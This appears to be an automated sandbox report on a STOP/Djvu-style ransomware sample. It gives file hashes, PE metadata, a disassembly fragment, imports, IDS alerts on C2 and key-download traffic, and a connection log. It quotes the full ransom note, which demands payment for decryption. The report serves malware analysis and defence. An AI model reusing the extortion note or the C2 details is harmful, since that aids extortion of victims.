              Entropy (8bit):7.840704685770641
              Encrypted:false
              SSDEEP:24:QfoImHkBwODrNNpb2SVNhRco6qQFPJEUzxHUiaGbXerqkcav4C7ij0vbD:QwImEz96SnLfQFP55jXerqkcawCejsD
              MD5:A434A126D29DA81F12D46F5DD9B4EDA5
              SHA1:9324D32DA5D595651905C505D08062DCCF91B9A8
              SHA-256:FC02D083E04718CE35C3283ABDA0CC981882451666933DE7B478F3AF62362E92
              SHA-512:C60559C8C7257427B6C0E5E2FBE98F6B085DDB10333873B7D6321099649680812B5CBF639232819D4EC6DD4EA02E0881FC6A9948012AFF296D6D3BBEEAAA4B82
              Malicious:false
              Preview:<?xmlm.HH...f...c...[.p%].i.i&'....C... d.j..$.k.}.z...s._.......:....+....x....~..|..@.4ka..]...xO..U.!..5[.5AB.C..E.(D.V...6....O>..9.........I?.<f.s.n..@M..7._9o.p...B.....NV?#=..a........y......}..7..^k..*0..W.M...0?...^....X..U..m.c1...W...Ck......W......G.A..+.7...SP...`F..*...D..l....}....{.......P..U=./h..(.t.$.i..Q....;c..(t..ia"......%vRJ....Y....P<..T:..I9.h..,s|.*S....9..../.[...7..gha.m.K...:..D.;Cso.....E.Jyu`.1]w.....'...g.2..|S..F...<..A....n....&E..R9#~..hIMj.......:6/...J.Rx5.9..{..?|..v....b.c.8..+h0..m;}.!.q...}dl.-?Q.CQ.~SV;.....`.....R.Q.h...y0.}7t.-..]....:.w...G!..*...&.[..x.ey..j..6.rPr.....).......&..+...Ct....m^*...c7.y.`.a....#......wD.Zz.5 ..2v.iF...q`.d#.v...x..[.8....y...&bc...a...<".8T...`.Z..N.....@.PQ....5.d..{.........A.`%.....t..[.&&1...7...ed.3........jN.P}[..)S...D\.b.P(oG\.(.~qK..^....5.9 ...9....)r._.B.....NH..RF...p....W.5b.._"........N0..!G.{6,.piA.......A.7C....v.h.....pO../........V...D..6.gN.....z'1.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1193
              Entropy (8bit):7.840704685770641
              Encrypted:false
              SSDEEP:24:QfoImHkBwODrNNpb2SVNhRco6qQFPJEUzxHUiaGbXerqkcav4C7ij0vbD:QwImEz96SnLfQFP55jXerqkcawCejsD
              MD5:A434A126D29DA81F12D46F5DD9B4EDA5
              SHA1:9324D32DA5D595651905C505D08062DCCF91B9A8
              SHA-256:FC02D083E04718CE35C3283ABDA0CC981882451666933DE7B478F3AF62362E92
              SHA-512:C60559C8C7257427B6C0E5E2FBE98F6B085DDB10333873B7D6321099649680812B5CBF639232819D4EC6DD4EA02E0881FC6A9948012AFF296D6D3BBEEAAA4B82
              Malicious:false
              Preview:<?xmlm.HH...f...c...[.p%].i.i&'....C... d.j..$.k.}.z...s._.......:....+....x....~..|..@.4ka..]...xO..U.!..5[.5AB.C..E.(D.V...6....O>..9.........I?.<f.s.n..@M..7._9o.p...B.....NV?#=..a........y......}..7..^k..*0..W.M...0?...^....X..U..m.c1...W...Ck......W......G.A..+.7...SP...`F..*...D..l....}....{.......P..U=./h..(.t.$.i..Q....;c..(t..ia"......%vRJ....Y....P<..T:..I9.h..,s|.*S....9..../.[...7..gha.m.K...:..D.;Cso.....E.Jyu`.1]w.....'...g.2..|S..F...<..A....n....&E..R9#~..hIMj.......:6/...J.Rx5.9..{..?|..v....b.c.8..+h0..m;}.!.q...}dl.-?Q.CQ.~SV;.....`.....R.Q.h...y0.}7t.-..]....:.w...G!..*...&.[..x.ey..j..6.rPr.....).......&..+...Ct....m^*...c7.y.`.a....#......wD.Zz.5 ..2v.iF...q`.d#.v...x..[.8....y...&bc...a...<".8T...`.Z..N.....@.PQ....5.d..{.........A.`%.....t..[.&&1...7...ed.3........jN.P}[..)S...D\.b.P(oG\.(.~qK..^....5.9 ...9....)r._.B.....NH..RF...p....W.5b.._"........N0..!G.{6,.piA.......A.7C....v.h.....pO../........V...D..6.gN.....z'1.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1383
              Entropy (8bit):7.829572135054364
              Encrypted:false
              SSDEEP:24:WKGkqTaAJAd8vvk7nz3eUDw5gYJkJSw4oNBFk02eS5GYri0db/IG2HUOHqfEUA7u:WPTanG3knzuUDw5g0kJSAXk0gg05KHUX
              MD5:146BA3DC6E83CE12DE564A541BF3A3CA
              SHA1:B3171780C163F60D70C5147EC3B5B7CE98A79582
              SHA-256:B44200B16D6279436B084DDF09D2757178D2ED06629F601A10155A2ADCB76FE2
              SHA-512:002DE739E05CEDCEAB795039A1D16E58C098B58C7FB6B51EEEEAD819C8AFA53116C33D958CF24247B2A0E84CB4781B49396A9976E56C09D6FC3DA7F88B5A01AB
              Malicious:false
              Preview:L....c.Bq.=.}:R_.K.G.).g0F/.u..]~.........pO.V.4...U.f.d..^.U.Z.K....^r2....-..W..c.J...1LnK..sO......+V.$d....v.=...Q..C...&=2.....d.h.p.jW.zC....-c=%.:..Ke(.pY:7.;.......~..6...*.5...3.sNNh.@p...E..0...E.E..i..D...p.#@./qQ-.3.s._w..*......<-\g....RM.`z7$s.w%C.......@..U.....h.g...EU....]9K.4.....J..A..=....X..YVpAh...J.2.R......7.N....p...B..-...6....W**%....... .m...Ji.h...c..7K........<..m...N.#.@v..g.LG.........|....h.P..n...%.0>..$j..Sz.y..u.Yc.wG.t.JKV.o.......:iP..m.zk).....3..'./...4.u..{./F.6.'...A..}%f.C.Qx:.J(.s.7..=.JGVQ......j..y.1bXt..y..:......=.-.k...|-.Z...%w..?0@.).;....i..-H....!1.T$..?L..]...g=...I..mf..H.9..xH...2...2.n.s.C7d.26b.g...lb@....W ..c.B.C..Uk..86)]<.Q..l.4..x.....5.6.......nN.xD4.(.c...(....&.....)5.....l1..*..Q....m.../.Dn.....OVD...;P...+...f.....c.u...dt.e1..Z..c....2..?N._.y.....h..".O..:..d...X..xeB....uA...8..O.....>....E8._.....FkD..03....t.....j..+...u....\R......F1..m;.V.`......>.n..J........
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):341
              Entropy (8bit):7.283684382244596
              Encrypted:false
              SSDEEP:6:Glzh4LXJVrMupi7GAAyltKgKaj+yFl818vugHB+4lpnUU33ukIcii96Z:Gz4LfWdtKOj+Sk8vxH0R+ukIcii9a
              MD5:3AC8B45E0FA89FB42F909059ADC72E6D
              SHA1:6705E484BF0F289B794DFB27F5CA57BD64DDC77C
              SHA-256:9CC3B4B04ADA25FB5290BD9F734556EE5F4231B1A1008428BA7D29142819B302
              SHA-512:329C12010D669B234DE1A05716DED75949FC921F8FC27AA9E059B5511519AA4D1999F1C211E6C6C7D873B63582B417B9A9C190982302D6710C1C58EA01274B7E
              Malicious:false
              Preview:deskt...G.d.C%i.F...t}.v...,....<...=Y..&.).In<...........9..B....!sX..}.....\e. ..x$.....l..wX'..9zJf.......s...o.s.....(2{d]<.$.*...F..p..a...;.m.)..(.....d.p.P...#J$uM.4.rK..^...BW...u.e..EnMv....1.G:<.s`.e5fK....9}.r$.....]s.....].I........8..;..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1381
              Entropy (8bit):4.87972850781078
              Encrypted:false
              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3Rx:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/k0
              MD5:242ED9093DBD2B45ED7A82B7BCCFEF72
              SHA1:FF3E9910D40999CA2F85F642F4AD7DDE53F9CFDE
              SHA-256:D8C1F5BD75A74514C114D902DD449FAE1ACAF6856B3EBD2BD6E3319BCE2ED968
              SHA-512:65196DA7590F9AC581160AFF99A15BAC5435A989EB48F668519CE31416DBE7BAA74DFFC446FFBA082AE9FC0AD26E3CEFBFAEAD245C81F4B7C72C2DB1605292F9
              Malicious:true
              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1381
              Entropy (8bit):4.87972850781078
              Encrypted:false
              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3Rx:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/k0
              MD5:242ED9093DBD2B45ED7A82B7BCCFEF72
              SHA1:FF3E9910D40999CA2F85F642F4AD7DDE53F9CFDE
              SHA-256:D8C1F5BD75A74514C114D902DD449FAE1ACAF6856B3EBD2BD6E3319BCE2ED968
              SHA-512:65196DA7590F9AC581160AFF99A15BAC5435A989EB48F668519CE31416DBE7BAA74DFFC446FFBA082AE9FC0AD26E3CEFBFAEAD245C81F4B7C72C2DB1605292F9
              Malicious:true
              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):7.21116287983223
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:66d5df681876c_file010924.exe
              File size:831'488 bytes
              MD5:7972b08246e568495d9d116fc2d0b159
              SHA1:3e12225494f08369858453fd9fc7481b4f788165
              SHA256:2a6c90c8db27e6ac04c7e339dfe4b3c2d47a292bcf6fc1c5b4e0ae62fc81ff84
              SHA512:f0ead246f31d1badb3cd5fd67cb5b3081f027fdad44dd50364734d61722f1bc2cacb1ad5d842ca3f7000a2699e7bdf059a508b54a95f5e155ae274d70e833ff7
              SSDEEP:24576:60oeRhL4Zihw/WaRupypku1ADMH0h0kT:60J482RuRuQMm
              TLSH:6C05024253E1AD20D5A2EB32DE3EF6F4762DB8019E687B5A23187F3F19711D2C522315
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H.z...z...z.......z....!..z.......z....,..z...z...z.......z....%..z...."..z..Rich.z..................PE..L....i.e...........
              Icon Hash:cd4d3d2e4e054d03
              Entrypoint:0x404daa
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:TERMINAL_SERVER_AWARE
              Time Stamp:0x65E669FA [Tue Mar 5 00:40:26 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:00e87a3230db3a6bdb4035240d620685
              Instruction
              call 00007FE5A947E822h
              jmp 00007FE5A947BB4Eh
              sub eax, 000003A4h
              je 00007FE5A947BCE4h
              sub eax, 04h
              je 00007FE5A947BCD9h
              sub eax, 0Dh
              je 00007FE5A947BCCEh
              dec eax
              je 00007FE5A947BCC5h
              xor eax, eax
              ret
              mov eax, 00000404h
              ret
              mov eax, 00000412h
              ret
              mov eax, 00000804h
              ret
              mov eax, 00000411h
              ret
              mov edi, edi
              push esi
              push edi
              mov esi, eax
              push 00000101h
              xor edi, edi
              lea eax, dword ptr [esi+1Ch]
              push edi
              push eax
              call 00007FE5A947E87Bh
              xor eax, eax
              movzx ecx, ax
              mov eax, ecx
              mov dword ptr [esi+04h], edi
              mov dword ptr [esi+08h], edi
              mov dword ptr [esi+0Ch], edi
              shl ecx, 10h
              or eax, ecx
              lea edi, dword ptr [esi+10h]
              stosd
              stosd
              stosd
              mov ecx, 004A2028h
              add esp, 0Ch
              lea eax, dword ptr [esi+1Ch]
              sub ecx, esi
              mov edi, 00000101h
              mov dl, byte ptr [ecx+eax]
              mov byte ptr [eax], dl
              inc eax
              dec edi
              jne 00007FE5A947BCB9h
              lea eax, dword ptr [esi+0000011Dh]
              mov esi, 00000100h
              mov dl, byte ptr [eax+ecx]
              mov byte ptr [eax], dl
              inc eax
              dec esi
              jne 00007FE5A947BCB9h
              pop edi
              pop esi
              ret
              mov edi, edi
              push ebp
              mov ebp, esp
              sub esp, 0000051Ch
              mov eax, dword ptr [004A2AC0h]
              xor eax, ebp
              mov dword ptr [ebp-04h], eax
              push ebx
              push edi
              lea eax, dword ptr [ebp-00000518h]
              push eax
              push dword ptr [esi+04h]
              call dword ptr [00401128h]
              mov edi, 00000100h
              Programming Language:
              • [C++] VS2010 build 30319
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xa14ac0x50.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x122d0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0xa14fc0x1c.text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34580x40.text
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x1d0.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000xa0f6a0xa10008e869e41c537fd6818f668f3622b2576False0.9477205454192547data7.924714226500883IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0xa20000x1a73280x1780005385c9d6b330d1fba3da24534ed356cFalse0.019707862367021278data0.2581819585895258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x24a0000x122d00x124009956e1605deee370ffeb98ebc4d9536bFalse0.3544520547945205data4.516383046908406IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountryZLIB Complexity
              AFX_DIALOG_LAYOUT0x256f480xedata1.5714285714285714
              AFX_DIALOG_LAYOUT0x256f580x2data5.0
              RT_CURSOR0x256f600x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
              RT_CURSOR0x2572900x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
              RT_CURSOR0x2573e80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.26439232409381663
              RT_CURSOR0x2582900x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.3686823104693141
              RT_CURSOR0x258b380x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.49060693641618497
              RT_CURSOR0x2590d00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.27238805970149255
              RT_CURSOR0x259f780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.375
              RT_CURSOR0x25a8200x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5057803468208093
              RT_ICON0x24a8300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.4672174840085288
              RT_ICON0x24a8300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.4672174840085288
              RT_ICON0x24b6d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.5753610108303249
              RT_ICON0x24b6d80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.5753610108303249
              RT_ICON0x24bf800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.6394009216589862
              RT_ICON0x24bf800x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.6394009216589862
              RT_ICON0x24c6480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.6936416184971098
              RT_ICON0x24c6480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.6936416184971098
              RT_ICON0x24cbb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.3565352697095436
              RT_ICON0x24cbb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.3565352697095436
              RT_ICON0x24f1580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilIndia0.44394934333958724
              RT_ICON0x24f1580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilSri Lanka0.44394934333958724
              RT_ICON0x2502000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilIndia0.519672131147541
              RT_ICON0x2502000x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilSri Lanka0.519672131147541
              RT_ICON0x250b880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.6152482269503546
              RT_ICON0x250b880x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.6152482269503546
              RT_ICON0x2510680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3675373134328358
              RT_ICON0x2510680xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3675373134328358
              RT_ICON0x251f100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.453971119133574
              RT_ICON0x251f100x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.453971119133574
              RT_ICON0x2527b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.45794930875576034
              RT_ICON0x2527b80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.45794930875576034
              RT_ICON0x252e800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
              RT_ICON0x252e800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
              RT_ICON0x2533e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.26815352697095435
              RT_ICON0x2533e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.26815352697095435
              RT_ICON0x2559900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.31097560975609756
              RT_ICON0x2559900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.31097560975609756
              RT_ICON0x256a380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3528368794326241
              RT_ICON0x256a380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3528368794326241
              RT_DIALOG0x25b0280x58data0.8977272727272727
              RT_STRING0x25b0800x3b8AmigaOS bitmap font "o", fc_YSize 26880, 22528 elements, 2nd "a", 3rd "v"TamilIndia0.4653361344537815
              RT_STRING0x25b0800x3b8AmigaOS bitmap font "o", fc_YSize 26880, 22528 elements, 2nd "a", 3rd "v"TamilSri Lanka0.4653361344537815
              RT_STRING0x25b4380x536dataTamilIndia0.444527736131934
              RT_STRING0x25b4380x536dataTamilSri Lanka0.444527736131934
              RT_STRING0x25b9700x1f4dataTamilIndia0.518
              RT_STRING0x25b9700x1f4dataTamilSri Lanka0.518
              RT_STRING0x25bb680x508dataTamilIndia0.4409937888198758
              RT_STRING0x25bb680x508dataTamilSri Lanka0.4409937888198758
              RT_STRING0x25c0700x260dataTamilIndia0.4934210526315789
              RT_STRING0x25c0700x260dataTamilSri Lanka0.4934210526315789
              RT_ACCELERATOR0x256f080x40dataTamilIndia0.875
              RT_ACCELERATOR0x256f080x40dataTamilSri Lanka0.875
              RT_GROUP_CURSOR0x2573c00x22data1.0294117647058822
              RT_GROUP_CURSOR0x2590a00x30data0.9375
              RT_GROUP_CURSOR0x25ad880x30data0.9375
              RT_GROUP_ICON0x250ff00x76dataTamilIndia0.6610169491525424
              RT_GROUP_ICON0x250ff00x76dataTamilSri Lanka0.6610169491525424
              RT_GROUP_ICON0x256ea00x68dataTamilIndia0.7115384615384616
              RT_GROUP_ICON0x256ea00x68dataTamilSri Lanka0.7115384615384616
              RT_VERSION0x25adb80x26cdata0.5419354838709678
              DLLImport
              KERNEL32.dllCreateJobObjectW, InterlockedCompareExchange, UnlockFile, CreateHardLinkA, GetTickCount, GetNumberFormatA, GetConsoleAliasExesW, SetCommState, GlobalAlloc, LoadLibraryW, LocalShrink, GetCalendarInfoA, SetVolumeMountPointA, GetSystemWindowsDirectoryA, GetConsoleAliasExesLengthW, SetConsoleCP, GetFileAttributesA, GetModuleFileNameW, CreateActCtxA, GetThreadPriorityBoost, VerifyVersionInfoW, GetLogicalDriveStringsA, GetCurrentDirectoryW, SetLastError, GetProcAddress, CreateNamedPipeA, GetConsoleDisplayMode, GetProcessVersion, SetEnvironmentVariableW, InterlockedExchangeAdd, CreateFileMappingW, GetNumberFormatW, CreateEventW, OpenEventA, QueryDosDeviceW, GlobalWire, EnumDateFormatsA, EnumResourceNamesA, VirtualProtect, WaitForDebugEvent, PeekConsoleInputA, GetShortPathNameW, SetProcessShutdownParameters, SetFileShortNameA, GetDiskFreeSpaceExA, ReadConsoleInputW, GetTempPathA, EnumCalendarInfoExA, LCMapStringW, CommConfigDialogW, HeapReAlloc, RtlUnwind, HeapSize, RaiseException, SetDefaultCommConfigW, GetCurrentProcess, SetEndOfFile, LoadLibraryA, GetLocaleInfoA, MultiByteToWideChar, GetLastError, HeapFree, HeapAlloc, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, IsProcessorFeaturePresent, HeapCreate, WriteFile, GetStdHandle, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetStringTypeW, Sleep
              USER32.dllLoadMenuW, CharUpperW, GetSysColor, GetMenuStringA, GetCaretPos, DrawStateA
              GDI32.dllGetCharWidthFloatA, CreateDCW, GetCharWidth32A, GetBitmapBits
              Language of compilation systemCountry where language is spokenMap
              TamilIndia
              TamilSri Lanka
              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
              2024-09-02T18:21:06.383076+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249701443192.168.2.7188.114.97.3
              2024-09-02T18:21:08.618997+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249702443192.168.2.7188.114.97.3
              2024-09-02T18:21:13.757401+0200TCP2036335ET MALWARE Win32/Filecoder.STOP Variant Public Key Download18049706190.220.21.28192.168.2.7
              2024-09-02T18:21:13.756183+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24970680192.168.2.7190.220.21.28
              2024-09-02T18:21:13.756183+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity14970680192.168.2.7190.220.21.28
              2024-09-02T18:21:20.656245+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249712443192.168.2.7188.114.97.3
              2024-09-02T18:21:13.757094+0200TCP2036335ET MALWARE Win32/Filecoder.STOP Variant Public Key Download18049705190.220.21.28192.168.2.7
              2024-09-02T18:23:06.711561+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249731443192.168.2.7188.114.97.3
              2024-09-02T18:21:33.150577+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249725443192.168.2.7188.114.97.3
              2024-09-02T18:21:44.860802+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249727443192.168.2.7188.114.97.3
              2024-09-02T18:21:10.605985+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249703443192.168.2.7188.114.97.3
              2024-09-02T18:21:13.756182+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24970580192.168.2.7190.220.21.28
              2024-09-02T18:21:13.756182+0200TCP2036334ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key14970580192.168.2.7190.220.21.28
              TimestampSource PortDest PortSource IPDest IP
              Sep 2, 2024 18:21:05.171914101 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:05.171938896 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:05.172029972 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:05.191123009 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:05.191139936 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:05.663440943 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:05.663573027 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:06.030391932 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:06.030437946 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:06.030831099 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:06.030888081 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:06.034231901 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:06.080511093 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:06.383085012 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:06.383148909 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:06.383162975 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:06.383177996 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:06.383203983 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:06.383233070 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:06.410352945 CEST49701443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:06.410386086 CEST44349701188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:07.537579060 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:07.537630081 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:07.537697077 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:07.549346924 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:07.549371004 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:08.019217014 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:08.019380093 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:08.032217979 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:08.032238960 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:08.032557011 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:08.032619953 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:08.034214973 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:08.076512098 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:08.619009018 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:08.619105101 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:08.619118929 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:08.619128942 CEST44349702188.114.97.3192.168.2.7
              Sep 2, 2024 18:21:08.619167089 CEST49702443192.168.2.7188.114.97.3
              Sep 2, 2024 18:21:08.619204044 CEST49702443192.168.2.7188.114.97.3
